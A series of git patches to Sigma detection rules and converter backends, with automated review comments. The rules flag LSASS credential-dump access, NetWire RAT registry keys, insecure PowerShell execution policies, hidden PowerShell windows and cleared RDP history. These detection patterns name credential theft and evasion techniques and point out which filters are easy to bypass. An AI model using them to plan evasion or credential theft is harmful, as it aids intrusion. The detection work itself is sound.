+ windows-printservice-operational:
+ product: windows
+ service: printservice-operational
+ conditions:
+ product_name: 'PrintService'
+ windows-smbclient-security:
+ product: windows
+ service: smbclient-security
+ conditions:
+ product_name: 'SmbClient'
+ qflow:
+ product: qflow
+ netflow:
+ product: netflow
+ ipfix:
+ product: ipfix
+ flow:
+ category: flow
fieldmappings:
dst:
- ip_dst_host
@@ -80,6 +195,7 @@ fieldmappings:
TargetObject: object
ObjectClass: object_type
ObjectValueName: object_name
+ ObjectName: object_name
DeviceClassName: object_name
Details: object_target
CallTrace: calltrace
diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py
index 17dbc6a1..4a4dcc26 100644
--- a/tools/sigma/backends/hawk.py
+++ b/tools/sigma/backends/hawk.py
@@ -1,4 +1,19 @@
-# Output backends for sigmac - HAWK.io
+# Output backends for sigmac
+# Copyright 2021 HAWK.io
+
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU Lesser General Public License for more details.
+
+# You should have received a copy of the GNU Lesser General Public License
+# along with this program. If not, see .
+ + import re
@@ -18,6 +33,7 @@ class HAWKBackend(SingleTextQueryBackend):
config_required = False
default_config = ["sysmon", "hawk"]
reEscape = re.compile('(")')
+ logname = None
reClear = None
andToken = " , "
orToken = " , "
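Review bot: `windows-printservice-admin` and `windows-printservice-operational` both resolve to the same `product_name: 'PrintService'` condition, so a rule written against either channel matches events from both once converted. If HAWK carries an attribute that distinguishes the Admin and Operational logs, that should be the condition here; if the merge is intentional, a short comment on the first of the two entries saying so would spare the next reader the question.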
@@ -63,6 +79,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(node) return self.generateSubexpressionNode(node) elif type(node) == tuple: + #print("TUPLE: ", node) return self.generateMapItemNode(node, notNode) elif type(node) in (str, int): nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "regex" }, "str": { "value": "5" } } } @@ -156,7 +173,9 @@ class HAWKBackend(SingleTextQueryBackend): if self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): nodeRet['key'] = self.cleanKey(key).lower() nodeRet['description'] = key - if type(value) == str and "*" in value: + if key.lower() in ("logname","source"): + self.logname = value + elif type(value) == str and "*" in value: # value = value.replace("*", ".*") value = value.replace("*", "") if notNode: 
@@ -314,15 +333,53 @@ class HAWKBackend(SingleTextQueryBackend): timeframe_object['months'] = int(duration) return timeframe_object + + def generateBefore(self, parsed): + if self.logname: + return self.logname + return self.logname + def generate(self, sigmaparser): """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + columns = list() + mapped =None + #print(sigmaparser.parsedyaml) + self.logsource = sigmaparser.parsedyaml.get("logsource") if sigmaparser.parsedyaml.get("logsource") else sigmaparser.parsedyaml.get("logsources", {}) + fields = "" + try: + #print(sigmaparser.parsedyaml["fields"]) + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + if type(mapped) == str: + columns.append(mapped) + elif type(mapped) == list: + columns.extend(mapped) + else: + raise TypeError("Field mapping must return string or list") + + fields = ",".join(str(x) for x in columns) + fields = " | table " + fields + + except KeyError: # no 'fields' attribute + mapped = None + pass + + #print("Mapped: ", mapped) #print(sigmaparser.parsedyaml) #print(sigmaparser.condparsed) + #print("Columns: ", columns) + #print("Fields: ", fields) + #print("Logsource: " , self.logsource) + for parsed in sigmaparser.condparsed: query = self.generateQuery(parsed, sigmaparser) before = self.generateBefore(parsed) after = self.generateAfter(parsed) + #print("Before: ", before) + + #print("Query: ", query) + result = "" if before is not None: result = before @@ -336,7 +393,6 @@ class HAWKBackend(SingleTextQueryBackend): def generateQuery(self, parsed, sigmaparser): self.sigmaparser = sigmaparser result = self.generateNode(parsed.parsedSearch) - self.parsedlogsource = sigmaparser.get_logsource().index """ if any("flow" in i for i in self.parsedlogsource): aql_database = "flows" 
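Review bot: `self.logname`, which `generateMapItemNode` sets in the `@@ -156,7 +173,9 @@` hunk above, is never reset in `generate`, so when one backend instance converts more than one rule a rule without a `logname`/`source` field inherits the previous rule's value through `generateBefore`; `self.logname = None` as the first statement of `generate` fixes that, after which `generateBefore` can be just `return self.logname`, since its `if` returns the same value on both paths. The new `logname` branch in `generateMapItemNode` also ends without a `return`, so that map item yields `None` and is dropped by the `None` filtering in `generateANDNode`/`generateORNode`; if removing the condition from the query is intended, say so in a comment on that branch. `fields = " | table " + fields` is computed in the new `try` block but never read afterwards, which reads as leftover from another backend.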
@@ -345,12 +401,12 @@ class HAWKBackend(SingleTextQueryBackend): """ prefix = "" ret = '[ { "id" : "and", "key": "And", "children" : [' - ret2 =" ] } ]" - """ + ret2 = ' ] } ]' try: mappedFields = [] for field in sigmaparser.parsedyaml["fields"]: mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + #print(mapped) mappedFields.append(mapped) if " " in mapped and not "(" in mapped: prefix += ", \"" + mapped + "\"" @@ -360,7 +416,6 @@ class HAWKBackend(SingleTextQueryBackend): except KeyError: # no 'fields' attribute mapped = None pass - """ #if parsed.parsedAgg: #and timeframe == None: # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) @@ -374,9 +429,9 @@ class HAWKBackend(SingleTextQueryBackend): # result = prefix + result #print(result) - result = prefix + json.dumps(result) - - #print(sigmaparser.parsedyaml) + #print("Prefix: ", prefix) + # result = prefix + json.dumps(result) + result = json.dumps(result) analytic_txt = ret + result + ret2 # json.dumps(ret) try: From deecced9627a518d1801af1400557fd3849c65e6 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Mon, 18 Oct 2021 12:11:32 +0200 Subject: [PATCH 1273/1367] fix: FP tuning when CommandLine logging is not activated for 4688 events --- .../windows/process_creation/win_susp_regsvr32_no_dll.yml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index 790363fa..621d962a 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line author: Florian Roth date: 2019/07/17 -modified: 2021/10/07 +modified: 2021/10/19 references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ tags: 
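Review bot: The re-enabled `mappedFields` loop builds `prefix` from the rule's `fields`, but the last hunk's `result = json.dumps(result)` no longer uses it, so the loop is dead code that still runs on every rule while the old `result = prefix + json.dumps(result)` stays commented out beside it. Either wire `prefix` back into the output or remove the block; `generate` in the preceding hunk already resolves the same `fields` mapping into `columns`, so one of the two copies should go. `generateQuery` continues outside this hunk.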
@@ -24,7 +24,11 @@ detection:
 - '.ax'
 - '.bav'
 - '.ppl'
- condition: selection and not filter
+ filter_null1_for_4688:
+ CommandLine: null
+ filter_null2_for_4688:
+ CommandLine: ''
+ condition: selection and not filter and not filter_null1_for_4688 and not filter_null2_for_4688
 fields:
 - CommandLine
 - ParentCommandLine
From a63cc967fe7f93f3c571ce344ece38fb43d63fb7 Mon Sep 17 00:00:00 2001
From: Andreas Hunkeler
Date: Tue, 19 Oct 2021 13:51:25 +0200
Subject: [PATCH 1274/1367] Fix MITRE tag in COM hijacking rule
---
 .../sysmon_registry_persistence_search_order.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml
index d97b58ca..ae9db5ae 100755
--- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml
+++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml
@@ -4,13 +4,13 @@ status: experimental
 description: Detects potential COM object hijacking leveraging the COM Search Order
 references:
 - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
+ - https://attack.mitre.org/techniques/T1546/015/
 author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
 date: 2020/04/14
 modified: 2021/09/16
 tags:
 - attack.persistence
- - attack.t1038 # an old one
- - attack.t1574.001
+ - attack.t1546.015
 logsource:
 category: registry_event
 product: windows
From 75193321f81652ef2eb4186ddfa0a05bf6b3f9bd Mon Sep 17 00:00:00 2001
From: phantinuss
Date: Tue, 19 Oct 2021 18:30:02 +0200
Subject: [PATCH 1275/1367] feat: mstsc history cleared
---
 .../registry_event_mstsc_history_cleared.yml | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 rules/windows/registry_event/registry_event_mstsc_history_cleared.yml
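Review bot: The two new filters differ only in the `CommandLine` value and the condition now names every filter by hand; Sigma's wildcard selector keeps it in one place and also covers the pre-existing `filter`: `condition: selection and not 1 of filter*`. Naming them `filter_null1_for_4688` / `filter_null2_for_4688` encodes the event id that motivated them, which is useful, so keep the names but add a one-line comment such as `# 4688 without command-line auditing yields an empty/absent CommandLine` so the intent survives. The `selection` block is outside the hunk, so I cannot confirm it still anchors on regsvr32.exe via `Image` rather than `CommandLine`.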
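Review bot: The `modified: 2021/09/16` context line is left unchanged although the tags and references of the rule change in this hunk; the other rule edits on this page (for example PATCH 1273 and PATCH 1282) bump `modified` whenever content changes, so this should be `modified: 2021/10/19` to match the commit date.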
diff --git a/rules/windows/registry_event/registry_event_mstsc_history_cleared.yml b/rules/windows/registry_event/registry_event_mstsc_history_cleared.yml new file mode 100644 index 00000000..4d969f09 --- /dev/null +++ b/rules/windows/registry_event/registry_event_mstsc_history_cleared.yml @@ -0,0 +1,27 @@ +title: Terminal Server Client Connection History Cleared +id: 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d +description: Detects the deletion of registry keys containing the MSTSC connection history +references: + - https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer + - http://woshub.com/how-to-clear-rdp-connections-history/ +tags: + - attack.defense_evasion + - attack.t1070 + - attack.t1112 +author: Christian Burkard +status: experimental +date: 2021/10/19 +logsource: + category: registry_event + product: windows +detection: + selection1: + EventType: DeleteValue + TargetObject|contains: '\Microsoft\Terminal Server Client\Default\MRU' + selection2: + EventType: DeleteKey + TargetObject|contains: '\Microsoft\Terminal Server Client\Servers\' + condition: 1 of them +falsepositives: + - unknown +level: high From ff439099bc985cb3936878a7aac9f26e6d149a94 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Tue, 19 Oct 2021 18:20:23 -0400 Subject: [PATCH 1276/1367] Create registry_event_mal_netwire.yml --- .../malware/registry_event_mal_netwire.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/malware/registry_event_mal_netwire.yml diff --git a/rules/windows/malware/registry_event_mal_netwire.yml b/rules/windows/malware/registry_event_mal_netwire.yml new file mode 100644 index 00000000..a8a1b29f --- /dev/null +++ b/rules/windows/malware/registry_event_mal_netwire.yml 
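Review bot: `falsepositives: - unknown` together with `level: high` is hard to reconcile with the rule's own references, which are how-to articles for clearing RDP history as a routine privacy/cleanup step, so the benign case is known rather than unknown; state it, e.g. `- Users or support scripts clearing the RDP connection history for privacy`, and consider whether `medium` fits better. `selection2` fires on `DeleteKey` of any `\Microsoft\Terminal Server Client\Servers\` subkey, i.e. also when a single stale server entry is removed, which is worth mentioning in `description` so tuning is easier. A `logsource.definition` noting that the Sysmon configuration must include the `Terminal Server Client` keys would help deployers, as the rule is silent without it.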
@@ -0,0 +1,29 @@ +title: NetWire RAT Registry Key +id: 1d218616-71b0-4c40-855b-9dbe75510f7f +description: Attempts to detect registry events for common NetWire key HKCU\Software\NetWire +Note: You likely will have to change the sysmon configuration file. + Per SwiftOnSecurity "Because Sysmon runs as a service, it has no filtering ability for, + or concept of, HKCU or HKEY_CURRENT_USER. Use "contains" or "end with" to get around this limitation" + Therefore I set netwire in my configuration. +status: experimental +references: + - https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing + - https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/ + - https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/ + - https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line + - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/ +tags: + - attack.defense_evasion + - attack.t1112 +date: 2021/10/07 +author: Christopher Peacock +level: high +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject|contains: '\software\NetWire' + condition: selection1 +falsepositives: + - No known false positives From 8f4a0cf4d6df593520d36272890ef3f413081ef5 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Tue, 19 Oct 2021 18:23:42 -0400 Subject: [PATCH 1277/1367] Update registry_event_mal_netwire.yml --- rules/windows/malware/registry_event_mal_netwire.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/malware/registry_event_mal_netwire.yml b/rules/windows/malware/registry_event_mal_netwire.yml index a8a1b29f..f844af14 100644 --- a/rules/windows/malware/registry_event_mal_netwire.yml +++ b/rules/windows/malware/registry_event_mal_netwire.yml 
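Review bot: `Note:` is not a Sigma top-level attribute, and its multi-line value (the SwiftOnSecurity quote about HKCU filtering) is deployment guidance that belongs in `logsource.definition`, the field other rules on this page use for requirements (see `definition:` in PATCH 1287); moving it there, as a single quoted string, keeps the rule schema-clean and keeps the advice. `falsepositives: - No known false positives` should follow the `Unknown` wording used by the neighbouring rules. The free-text quote also contains unbalanced double quotes across continuation lines, which parses today only because it is a plain scalar; a quoted `definition` avoids that fragility.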
@@ -14,7 +14,7 @@ references: - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/ tags: - attack.defense_evasion - - attack.t1112 + - attack.t1112 #The configuration information is usually stored under HKCU:\Software\Netwire - RedCanary date: 2021/10/07 author: Christopher Peacock level: high From f9efc127de4b4382b11d0ada4eb277b3965243b0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 20 Oct 2021 12:58:43 +0200 Subject: [PATCH 1278/1367] add powershell_set_policies_to_unsecure_level --- ...ershell_set_policies_to_unsecure_level.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml diff --git a/rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml b/rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml new file mode 100644 index 00000000..3c53354e --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_set_policies_to_unsecure_level.yml @@ -0,0 +1,27 @@ +title: Change PowerShell Policies to a Unsecure Level +id: 61d0475c-173f-4844-86f7-f3eebae1c66b +description: Detects use of Set-ExecutionPolicy to set a unsecure policies +references: + - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 + - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 + - https://adsecurity.org/?p=2604 +tags: + - attack.execution + - attack.t1059.001 +author: frack113 +date: 2021/10/20 +logsource: + product: windows + category: ps_script +detection: + cmdlet: + ScriptBlockText|contains: 'Set-ExecutionPolicy' + option: + ScriptBlockText|contains: + - 'Unrestricted' + - 'bypass' + - 'RemoteSigned' + condition: cmdlet and option +falsepositives: + - Administrator script +level: high \ No newline at end of file 
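Review bot: The new `powershell_set_policies_to_unsecure_level.yml` has no `status:` field, unlike every other new rule on this page; add `status: experimental`. `RemoteSigned` in the `option` list is the default execution policy on Windows Server and a common administrator setting, so at `level: high` the rule will fire on routine configuration; either drop `RemoteSigned` or lower the level and say so under `falsepositives`. Title and description read "a Unsecure policies"; `Change PowerShell Policies to an Insecure Level` / `Detects use of Set-ExecutionPolicy to set an insecure policy` is the intended wording.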
From a9bc26f37cb7097b7391ab755a01a07ddc0b62d6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 20 Oct 2021 13:57:24 +0200 Subject: [PATCH 1279/1367] add powershell_suspicious_windowstyle --- .../powershell_suspicious_windowstyle.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml new file mode 100644 index 00000000..da2d506f --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_windowstyle.yml @@ -0,0 +1,24 @@ +title: Suspicious PowerShell WindowStyle Option +id: 313fbb0a-a341-4682-848d-6d6f8c4fab7c +status: experimental +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md +description: Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden +tags: + - attack.defense_evasion + - attack.t1564.003 +author: frack113 +date: 2021/10/20 +logsource: + product: windows + category: ps_script +detection: + selection: + ScriptBlockText|contains|all: + - 'powershell' + - 'WindowStyle' + - 'Hidden' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From 47502e67011bfca75b176f1112206be0d5873f44 Mon Sep 17 00:00:00 2001 From: Stefan Grimminck Date: Wed, 20 Oct 2021 14:29:57 +0200 Subject: [PATCH 1280/1367] add MITRE technique mapping --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 1 + rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml | 1 + 2 files changed, 2 insertions(+) 
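Review bot: The `description` of `powershell_suspicious_windowstyle.yml` reads like the ATT&CK T1564.003 technique text rather than describing what the selection matches; a reader tuning the rule needs the latter, e.g. `description: Detects PowerShell script blocks that spawn powershell with the WindowStyle Hidden option, used to keep the console window out of the user's sight`. `ScriptBlockText|contains|all` on the three substrings will also match scripts that merely mention the option in a string or comment, which is worth stating under `falsepositives` instead of `Unknown`.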
diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml
index b7bcf6e1..d6d22c65 100644
--- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml
+++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml
@@ -18,3 +18,4 @@ falsepositives:
 level: medium
 tags:
 - attack.impact
+ - attack.t1485
diff --git a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml
index 342d5744..1ffc1495 100644
--- a/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml
+++ b/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml
@@ -18,6 +18,7 @@ detection:
 level: low
 tags:
 - attack.impact
+ - attack.t1485
 falsepositives:
 - EKS Cluster being created or deleted may be performed by a system administrator.
 - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
From 7500346ce76395a3de86c564fc852cff7fcfa6bb Mon Sep 17 00:00:00 2001
From: al3t <92431865+al3t@users.noreply.github.com>
Date: Wed, 20 Oct 2021 17:06:55 +0300
Subject: [PATCH 1281/1367] Update winlogbeat-modules-enabled.yml updating field mapping
---
 tools/config/winlogbeat-modules-enabled.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml
index 99c98191..a917b4c6 100644
--- a/tools/config/winlogbeat-modules-enabled.yml
+++ b/tools/config/winlogbeat-modules-enabled.yml
@@ -110,7 +110,7 @@ fieldmappings:
 #Keywords: from "Value" is lost with winlogbeat exist in nxlog
 Provider_Name: winlog.provider_name
 CallingProcessName: winlog.event_data.CallingProcessName
- ComputerName: winlog.ComputerName
+ ComputerName: winlog.computer_name
 EventType: winlog.event_data.EventType
 FailureCode: winlog.event_data.FailureCode
 FileName: file.path
From 216b2d65d9ae61d906c7adbecf4293be0ad39f8d Mon Sep 17 00:00:00 2001
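Review bot: Both AWS hunks add `attack.t1485` without touching a `modified:` date; the diffstat shows exactly one insertion per file, so neither rule records that its mapping changed, while the other rule edits on this page bump `modified` on every content change. Add (or update) `modified: 2021/10/20` in both files alongside the new tag.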
From: frack113 Date: Wed, 20 Oct 2021 19:45:38 +0200 Subject: [PATCH 1282/1367] fix SourceImage --- .../windows/process_access/sysmon_cred_dump_lsass_access.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml b/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml index dfaf68fc..e4c5cea6 100755 --- a/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/sysmon_cred_dump_lsass_access.yml @@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2021/05/16 +modified: 2021/10/20 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -38,7 +38,7 @@ detection: - '0x1f2fff' - '0x1f3fff' filter: - ProcessName|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts + SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts - '\wmiprvse.exe' - '\taskmgr.exe' - '\procexp64.exe' From a47645a084842193a800be72c4f874e690510a17 Mon Sep 17 00:00:00 2001 From: V1D1AN Date: Thu, 21 Oct 2021 08:34:41 +0200 Subject: [PATCH 1283/1367] Modify event.provider to event.module --- tools/config/ecs-auditbeat-modules-enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/ecs-auditbeat-modules-enabled.yml b/tools/config/ecs-auditbeat-modules-enabled.yml index 9251d711..f078c96e 100644 --- a/tools/config/ecs-auditbeat-modules-enabled.yml +++ b/tools/config/ecs-auditbeat-modules-enabled.yml 
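Review bot: The corrected `SourceImage|endswith` filter still excludes any process whose image name ends in one of the listed basenames regardless of directory, as the inline comment "easy to bypass" already concedes; now that the field is right, anchoring the system binaries to their install path, e.g. `- '\Windows\System32\taskmgr.exe'` instead of `- '\taskmgr.exe'`, narrows the exclusion at no cost to the documented false positives. The remainder of the filter list is outside the hunk, so the same treatment may apply to entries I cannot see.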
@@ -18,7 +18,7 @@ logsources:
 product: linux
 service: auditd
 conditions:
- event.provider: auditd
+ event.module: auditd
 defaultindex: auditbeat-*
From 6c7d5124f5d0fcf2fd212114a6ee94dbc4492ac3 Mon Sep 17 00:00:00 2001
From: frack113
Date: Thu, 21 Oct 2021 09:28:33 +0200
Subject: [PATCH 1284/1367] fix detection
---
 .../sysmon_in_memory_assembly_execution.yml | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml
index 50b71bbe..02285b7d 100755
--- a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml
+++ b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml
@@ -7,7 +7,7 @@ description: Detects the access to processes by other suspicious processes which
 routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
 status: experimental
 date: 2019/10/27
-modified: 2021/05/16
+modified: 2021/10/21
 author: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
 references:
 - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
@@ -23,8 +23,8 @@ logsource:
 detection:
 selection1:
 CallTrace|contains|all:
- - 'C:\\Windows\\SYSTEM32\\ntdll.dll+'
- - '|C:\\Windows\\System32\\KERNELBASE.dll+'
+ - 'C:\Windows\SYSTEM32\ntdll.dll+'
+ - '|C:\Windows\System32\KERNELBASE.dll+'
 - '|UNKNOWN('
 - ')'
 selection2:
@@ -34,7 +34,6 @@ detection:
 CallTrace|endswith: ")"
 selection3:
 CallTrace|contains: "UNKNOWN"
- granted_access:
 GrantedAccess:
 - "0x1F0FFF"
 - "0x1F1FFF"
@@ -47,7 +46,7 @@ detection:
 filter:
 SourceImage|endswith:
 - '\Windows\System32\sdiagnhost.exe'
- condition: (selection1 or selection2) or (selection3 and granted_access) and not filter
+ condition: selection1 or selection2 or selection3 and not filter
 fields:
 - ComputerName
 - User
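Review bot: The rewritten `condition: selection1 or selection2 or selection3 and not filter` in the last hunk of `sysmon_in_memory_assembly_execution.yml` does not apply the sdiagnhost.exe exclusion to all three selections: Sigma's condition grammar binds `and` tighter than `or` (precedence `not` > `and` > `or`), so it parses as `selection1 or selection2 or (selection3 and not filter)`. If the filter is meant to cover every branch, as the old parenthesised form suggests, write `condition: (selection1 or selection2 or selection3) and not filter` or `condition: 1 of selection* and not filter`. The `@@ -34` hunk folds `GrantedAccess` into `selection3` by deleting the `granted_access:` key, which is presumably intended given the new condition, but it is worth a line in the commit message since it changes which events the access-mask list applies to.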
From 4394aa685d60f0b0dd2af3c73e411dbe96c26065 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 21 Oct 2021 09:47:06 +0200 Subject: [PATCH 1285/1367] fix cast --- rules/windows/process_access/sysmon_invoke_phantom.yml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_access/sysmon_invoke_phantom.yml b/rules/windows/process_access/sysmon_invoke_phantom.yml index f779354d..47481481 100755 --- a/rules/windows/process_access/sysmon_invoke_phantom.yml +++ b/rules/windows/process_access/sysmon_invoke_phantom.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service. author: Tim Burrell date: 2020/01/02 -modified: 2020/08/24 +modified: 2021/10/21 references: - https://github.com/hlldz/Invoke-Phant0m - https://twitter.com/timbmsft/status/900724491076214784 @@ -17,10 +17,9 @@ logsource: product: windows detection: selection: - TargetImage|endswith: '\windows\system32\svchost.exe' - GrantedAccess: '0x1f3fff' - CallTrace|contains: - - 'unknown' + TargetImage|endswith: '\WINDOWS\System32\svchost.exe' + GrantedAccess: '0x1F3FFF' + CallTrace|contains: 'UNKNOWN' condition: selection falsepositives: - unknown From 1775db7fe80feae8895dd01b5c93232bb12bc52d Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 21 Oct 2021 09:58:32 +0200 Subject: [PATCH 1286/1367] fix cast --- .../process_access/sysmon_in_memory_assembly_execution.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml index 02285b7d..8455bfee 100755 --- a/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml +++ b/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml 
@@ -23,8 +23,8 @@ logsource: detection: selection1: CallTrace|contains|all: - - 'C:\Windows\SYSTEM32\ntdll.dll+' - - '|C:\Windows\System32\KERNELBASE.dll+' + - 'C:\WINDOWS\SYSTEM32\ntdll.dll+' + - '|C:\WINDOWS\System32\KERNELBASE.dll+' - '|UNKNOWN(' - ')' selection2: From 9c25c89dbb045b5d431a9c723cae7e1306a47b40 Mon Sep 17 00:00:00 2001 From: Maxime THIEBAUT <46688461+0xThiebaut@users.noreply.github.com> Date: Thu, 21 Oct 2021 10:38:49 +0200 Subject: [PATCH 1287/1367] Add LOLBin rule win_susp_workfolders --- .../process_creation/win_susp_diskshadow.yml | 2 +- .../process_creation/win_susp_workfolders.yml | 25 +++++++++++++++++++ 2 files changed, 26 insertions(+), 1 deletion(-) create mode 100644 rules/windows/process_creation/win_susp_workfolders.yml diff --git a/rules/windows/process_creation/win_susp_diskshadow.yml b/rules/windows/process_creation/win_susp_diskshadow.yml index 6c57237e..e7f857ac 100644 --- a/rules/windows/process_creation/win_susp_diskshadow.yml +++ b/rules/windows/process_creation/win_susp_diskshadow.yml @@ -12,7 +12,7 @@ date: 2020/10/07 logsource: category: process_creation product: windows - definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit msut Include command line in process creation events' + definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit must Include command line in process creation events' detection: selection: Image|endswith: '\diskshadow.exe' diff --git a/rules/windows/process_creation/win_susp_workfolders.yml b/rules/windows/process_creation/win_susp_workfolders.yml new file mode 100644 index 00000000..99bf31a2 --- /dev/null +++ b/rules/windows/process_creation/win_susp_workfolders.yml 
